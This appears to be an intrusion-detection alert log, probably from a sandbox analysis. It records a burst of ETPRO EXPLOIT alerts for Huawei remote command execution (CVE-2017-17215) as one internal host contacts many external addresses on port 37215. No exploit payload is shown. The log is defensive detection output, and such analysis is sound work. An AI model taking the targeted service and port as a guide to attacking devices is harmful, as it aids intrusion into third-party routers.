                                                        06/13/24-21:32:07.402208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619037215192.168.2.1441.30.105.73
                                                        06/13/24-21:32:17.676570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464837215192.168.2.14197.37.125.132
                                                        06/13/24-21:32:01.246627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277837215192.168.2.14156.149.71.33
                                                        06/13/24-21:32:32.154653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963437215192.168.2.1441.7.71.48
                                                        06/13/24-21:32:28.028039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956437215192.168.2.14156.55.64.30
                                                        06/13/24-21:32:56.757412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892037215192.168.2.1441.130.197.37
                                                        06/13/24-21:33:02.913414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608037215192.168.2.1441.6.41.18
                                                        06/13/24-21:32:09.458477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465837215192.168.2.14197.93.105.232
                                                        06/13/24-21:32:25.975424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917637215192.168.2.1441.183.208.65
                                                        06/13/24-21:32:54.707077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613437215192.168.2.14197.252.67.9
                                                        06/13/24-21:32:44.453971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203237215192.168.2.1441.163.234.153
                                                        06/13/24-21:33:15.252279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219437215192.168.2.1441.72.149.249
                                                        06/13/24-21:31:57.130401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257037215192.168.2.14197.177.48.18
                                                        06/13/24-21:32:42.419463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282437215192.168.2.14197.171.150.49
                                                        06/13/24-21:32:03.301353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580437215192.168.2.1441.9.2.99
                                                        06/13/24-21:33:04.993978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351837215192.168.2.14197.221.25.35
                                                        06/13/24-21:33:00.884023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492037215192.168.2.1441.81.42.196
                                                        06/13/24-21:32:44.458156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922437215192.168.2.14156.135.155.58
                                                        06/13/24-21:32:46.525587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565037215192.168.2.14197.213.162.1
                                                        06/13/24-21:32:50.610938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5747037215192.168.2.1441.97.252.135
                                                        06/13/24-21:32:23.831225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293837215192.168.2.1441.32.245.125
                                                        06/13/24-21:32:58.820260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840437215192.168.2.14197.117.83.179
                                                        06/13/24-21:32:32.166161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771437215192.168.2.1441.3.105.50
                                                        06/13/24-21:32:13.545751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5320637215192.168.2.14197.16.108.122
                                                        06/13/24-21:32:17.695969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862437215192.168.2.14197.22.40.159
                                                        06/13/24-21:32:03.278817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944037215192.168.2.14156.36.62.71
                                                        06/13/24-21:32:23.929054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775837215192.168.2.1441.167.24.148
                                                        06/13/24-21:32:25.977342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304037215192.168.2.14197.142.97.35
                                                        06/13/24-21:32:48.554961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597237215192.168.2.14197.171.71.157
                                                        06/13/24-21:32:23.832194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357637215192.168.2.14156.152.168.157
                                                        06/13/24-21:32:01.222980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335037215192.168.2.14156.250.205.241
                                                        06/13/24-21:32:48.554195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298237215192.168.2.1441.109.55.44
                                                        06/13/24-21:32:42.419921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084637215192.168.2.1441.165.34.188
                                                        06/13/24-21:32:32.149306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950037215192.168.2.1441.61.241.197
                                                        06/13/24-21:32:34.217609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3722437215192.168.2.14156.16.96.133
                                                        06/13/24-21:32:40.358732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876437215192.168.2.14197.83.190.174
                                                        06/13/24-21:32:28.042614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595037215192.168.2.14197.153.1.74
                                                        06/13/24-21:33:09.112550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021637215192.168.2.1441.243.62.27
                                                        06/13/24-21:32:23.832594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778637215192.168.2.1441.250.11.240
                                                        06/13/24-21:32:30.079675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265237215192.168.2.14156.207.3.64
                                                        06/13/24-21:33:02.913308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847437215192.168.2.1441.1.5.122
                                                        06/13/24-21:33:07.040034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382637215192.168.2.14156.161.162.141
                                                        06/13/24-21:32:21.783868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6093637215192.168.2.1441.141.3.21
                                                        06/13/24-21:31:59.176782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123437215192.168.2.14156.184.148.27
                                                        06/13/24-21:32:25.994432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362637215192.168.2.14197.11.44.246
                                                        06/13/24-21:32:34.194964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334037215192.168.2.14156.126.228.81
                                                        06/13/24-21:32:07.402759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866437215192.168.2.14156.49.52.185
                                                        06/13/24-21:33:04.989692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3622637215192.168.2.14197.104.243.224
                                                        06/13/24-21:32:58.842063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810637215192.168.2.14197.189.142.198
                                                        06/13/24-21:33:15.255343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149637215192.168.2.14197.186.171.121
                                                        06/13/24-21:32:17.670664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156037215192.168.2.14156.69.129.50
                                                        06/13/24-21:33:17.308787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983837215192.168.2.14197.51.83.53
                                                        06/13/24-21:32:52.658149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981237215192.168.2.14156.26.113.202
                                                        06/13/24-21:32:38.318558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993237215192.168.2.14197.212.25.90
                                                        06/13/24-21:32:34.192958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806837215192.168.2.14197.89.222.121
                                                        06/13/24-21:32:13.544420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222437215192.168.2.14197.142.49.241
                                                        06/13/24-21:32:58.819566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589037215192.168.2.1441.185.224.7
                                                        06/13/24-21:32:01.219148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040437215192.168.2.14156.193.243.130
                                                        06/13/24-21:33:13.214634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689837215192.168.2.14156.28.201.193
                                                        06/13/24-21:32:40.355429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722637215192.168.2.14156.153.26.147
                                                        06/13/24-21:32:05.369906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931237215192.168.2.1441.245.132.113
                                                        06/13/24-21:32:54.710156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.14156.192.22.118
                                                        06/13/24-21:33:11.159334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861237215192.168.2.14197.126.185.19
                                                        06/13/24-21:32:38.301843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987437215192.168.2.1441.243.80.120
                                                        06/13/24-21:32:11.507517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3522237215192.168.2.14156.76.59.149
                                                        06/13/24-21:32:23.836193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476837215192.168.2.1441.12.12.200
                                                        06/13/24-21:33:17.307304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000837215192.168.2.14197.199.126.118
                                                        06/13/24-21:32:07.418042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653037215192.168.2.14156.193.183.124
                                                        06/13/24-21:32:13.547138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166237215192.168.2.14197.6.176.246
                                                        06/13/24-21:33:17.307799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335237215192.168.2.14156.144.89.31
                                                        06/13/24-21:32:19.731572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5506437215192.168.2.1441.161.33.236
                                                        06/13/24-21:32:01.220172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247637215192.168.2.14197.11.254.119
                                                        06/13/24-21:32:15.610905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991037215192.168.2.1441.184.166.180
                                                        06/13/24-21:32:42.406216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869837215192.168.2.14156.59.79.24
                                                        06/13/24-21:32:44.454021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802637215192.168.2.14197.31.95.47
                                                        06/13/24-21:32:32.152754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628037215192.168.2.14197.110.177.213
                                                        06/13/24-21:32:54.711833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192437215192.168.2.14156.175.243.168
                                                        06/13/24-21:33:11.159139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510237215192.168.2.14197.32.79.97
                                                        06/13/24-21:32:42.424540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5043237215192.168.2.1441.240.174.145
                                                        06/13/24-21:33:02.913494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633237215192.168.2.14156.220.87.119
                                                        06/13/24-21:33:07.057800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794637215192.168.2.14197.171.227.164
                                                        06/13/24-21:32:56.754794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135637215192.168.2.1441.151.102.120
                                                        06/13/24-21:32:23.835432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998237215192.168.2.1441.55.175.168
                                                        06/13/24-21:32:15.610701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729637215192.168.2.14156.214.97.174
                                                        06/13/24-21:32:52.676286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614037215192.168.2.1441.99.109.183
                                                        06/13/24-21:32:28.027769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315837215192.168.2.14156.228.6.135
                                                        06/13/24-21:32:15.611033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909437215192.168.2.14156.236.77.235
                                                        06/13/24-21:32:17.675802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820437215192.168.2.14197.131.117.33
                                                        06/13/24-21:33:17.308913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208037215192.168.2.1441.168.203.24
                                                        06/13/24-21:32:11.488525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046837215192.168.2.1441.239.38.249
                                                        06/13/24-21:31:59.198038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278037215192.168.2.1441.124.145.165
                                                        06/13/24-21:32:58.819964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030237215192.168.2.14156.248.131.0
                                                        06/13/24-21:32:30.078596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039837215192.168.2.1441.255.170.209
                                                        06/13/24-21:33:09.085687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5423837215192.168.2.14197.230.43.190
                                                        06/13/24-21:33:09.129442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536437215192.168.2.14156.142.76.235
                                                        06/13/24-21:32:19.748612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875837215192.168.2.14156.179.44.143
                                                        06/13/24-21:32:28.026409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079437215192.168.2.1441.92.160.136
                                                        06/13/24-21:32:40.379980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5906237215192.168.2.14197.85.71.34
                                                        06/13/24-21:31:57.094178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548437215192.168.2.14156.194.188.235
                                                        06/13/24-21:32:30.128063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374437215192.168.2.1441.172.175.236
                                                        06/13/24-21:32:40.353700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526837215192.168.2.14197.104.176.150
                                                        06/13/24-21:32:38.316619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893037215192.168.2.1441.242.213.232
                                                        06/13/24-21:32:30.091969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715237215192.168.2.14156.206.33.75
                                                        06/13/24-21:32:56.784937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113637215192.168.2.14197.201.34.11
                                                        06/13/24-21:33:13.231687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714037215192.168.2.14197.255.128.68
                                                        06/13/24-21:32:40.380426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446837215192.168.2.14197.132.139.124
                                                        06/13/24-21:32:09.460156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429637215192.168.2.1441.49.103.121
                                                        06/13/24-21:32:25.991434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065037215192.168.2.1441.241.96.222
                                                        06/13/24-21:31:57.130933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564837215192.168.2.14197.169.39.140
                                                        06/13/24-21:31:57.091075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887037215192.168.2.14156.16.175.101
                                                        06/13/24-21:31:59.194736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291237215192.168.2.14156.210.147.248
                                                        06/13/24-21:33:17.339438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728837215192.168.2.14197.237.237.87
                                                        06/13/24-21:32:21.787417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4531637215192.168.2.14156.197.118.146
                                                        06/13/24-21:33:11.177385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638837215192.168.2.1441.208.251.106
                                                        06/13/24-21:32:21.785814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540037215192.168.2.1441.151.85.113
                                                        06/13/24-21:32:58.838244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930637215192.168.2.1441.203.118.241
                                                        06/13/24-21:33:15.255665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966637215192.168.2.14156.142.81.162
                                                        06/13/24-21:32:32.165315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483037215192.168.2.14156.24.35.120
                                                        06/13/24-21:32:15.635925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211637215192.168.2.1441.149.7.195
                                                        06/13/24-21:32:17.675038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792437215192.168.2.14156.57.29.14
                                                        06/13/24-21:32:21.804805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861837215192.168.2.14197.219.207.144
                                                        06/13/24-21:31:59.174571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752837215192.168.2.1441.116.41.50
                                                        06/13/24-21:32:40.376624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844037215192.168.2.14197.137.180.218
                                                        06/13/24-21:32:23.834397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835237215192.168.2.1441.112.157.149
                                                        06/13/24-21:32:58.820200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915237215192.168.2.1441.233.6.35
                                                        06/13/24-21:32:25.973570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348237215192.168.2.14156.84.46.49
                                                        06/13/24-21:33:07.058422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4603637215192.168.2.14197.183.16.191
                                                        06/13/24-21:32:25.968257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782637215192.168.2.14156.177.76.212
                                                        06/13/24-21:33:17.307719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490837215192.168.2.14197.187.252.173
                                                        06/13/24-21:33:04.987665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214437215192.168.2.14156.218.38.255
                                                        06/13/24-21:32:48.569364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440837215192.168.2.14156.216.188.208
                                                        06/13/24-21:32:32.168092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3519237215192.168.2.14156.3.6.13
                                                        06/13/24-21:32:11.507487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484637215192.168.2.14197.130.16.171
                                                        06/13/24-21:33:11.153997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5924237215192.168.2.14156.48.185.76
                                                        06/13/24-21:32:25.990302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321237215192.168.2.14197.55.231.138
                                                        06/13/24-21:32:19.726515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642437215192.168.2.14197.182.164.20
                                                        06/13/24-21:33:13.214315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727437215192.168.2.14197.182.205.191
                                                        06/13/24-21:33:17.308071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539437215192.168.2.14156.167.17.210
                                                        06/13/24-21:32:11.486707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208037215192.168.2.1441.232.61.61
                                                        06/13/24-21:32:17.677821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573837215192.168.2.14156.144.63.149
                                                        06/13/24-21:32:56.755946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406637215192.168.2.1441.45.201.214
                                                        06/13/24-21:33:11.159477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380637215192.168.2.14197.18.162.9
                                                        06/13/24-21:31:59.177814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3408837215192.168.2.14156.165.95.110
                                                        06/13/24-21:33:17.310285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347037215192.168.2.1441.255.145.15
                                                        06/13/24-21:32:21.800013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5289837215192.168.2.1441.149.195.190
                                                        06/13/24-21:33:05.011790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409237215192.168.2.14197.30.22.205
                                                        06/13/24-21:32:07.420138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009437215192.168.2.1441.142.220.65
                                                        06/13/24-21:32:44.452811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452437215192.168.2.1441.136.3.13
                                                        06/13/24-21:32:52.660566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5038637215192.168.2.1441.12.115.79
                                                        06/13/24-21:32:28.025419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513037215192.168.2.14156.31.112.156
                                                        06/13/24-21:32:11.488241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935037215192.168.2.14197.243.216.19
                                                        06/13/24-21:32:15.609864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562837215192.168.2.1441.141.117.123
                                                        06/13/24-21:32:25.994703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275037215192.168.2.14197.136.48.150
                                                        06/13/24-21:32:44.475360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.1441.114.4.231
                                                        06/13/24-21:32:25.974580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653437215192.168.2.1441.220.69.23
                                                        06/13/24-21:32:09.439026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473837215192.168.2.14156.69.189.8
                                                        06/13/24-21:32:25.991237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003837215192.168.2.1441.174.252.98
                                                        06/13/24-21:32:36.262929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793637215192.168.2.14156.44.63.84
                                                        06/13/24-21:32:05.378487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223637215192.168.2.14156.78.253.178
                                                        06/13/24-21:32:17.694823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691037215192.168.2.14156.102.249.246
                                                        06/13/24-21:32:13.567257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417837215192.168.2.14156.29.236.2
                                                        06/13/24-21:32:07.403450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099037215192.168.2.14156.96.32.19
                                                        06/13/24-21:32:58.821069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021037215192.168.2.14156.224.187.129
                                                        06/13/24-21:32:36.247564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381837215192.168.2.1441.206.187.68
                                                        06/13/24-21:32:46.503671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649437215192.168.2.1441.89.204.171
                                                        06/13/24-21:33:15.274475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156637215192.168.2.14197.119.189.109
                                                        06/13/24-21:32:17.678880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771237215192.168.2.14197.249.143.48
                                                        06/13/24-21:33:13.230515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211437215192.168.2.14156.13.255.146
                                                        06/13/24-21:32:21.783565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4171637215192.168.2.14197.239.232.11
                                                        06/13/24-21:32:11.487240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775837215192.168.2.1441.175.217.173
                                                        06/13/24-21:32:34.194795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508837215192.168.2.1441.225.75.4
                                                        06/13/24-21:32:34.217128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148837215192.168.2.1441.82.193.173
                                                        06/13/24-21:33:07.040778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372637215192.168.2.1441.157.55.17
                                                        06/13/24-21:32:44.474737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823037215192.168.2.1441.4.89.163
                                                        06/13/24-21:33:04.990741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967437215192.168.2.1441.46.155.76
                                                        06/13/24-21:32:13.546924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108637215192.168.2.14156.153.247.11
                                                        06/13/24-21:32:13.547477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247637215192.168.2.14156.42.44.215
                                                        06/13/24-21:32:15.607760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927437215192.168.2.14197.182.19.224
                                                        06/13/24-21:33:09.127144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960237215192.168.2.14156.123.133.136
                                                        06/13/24-21:31:59.177114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775837215192.168.2.1441.184.239.229
                                                        06/13/24-21:32:15.629981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537637215192.168.2.1441.187.222.116
                                                        06/13/24-21:32:25.975864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276237215192.168.2.1441.182.111.101
                                                        06/13/24-21:32:30.080028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812837215192.168.2.14197.252.101.14
                                                        06/13/24-21:32:17.677315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360637215192.168.2.14197.164.213.131
                                                        06/13/24-21:33:15.271029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787237215192.168.2.1441.223.184.38
                                                        06/13/24-21:32:15.632751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478237215192.168.2.1441.237.75.184
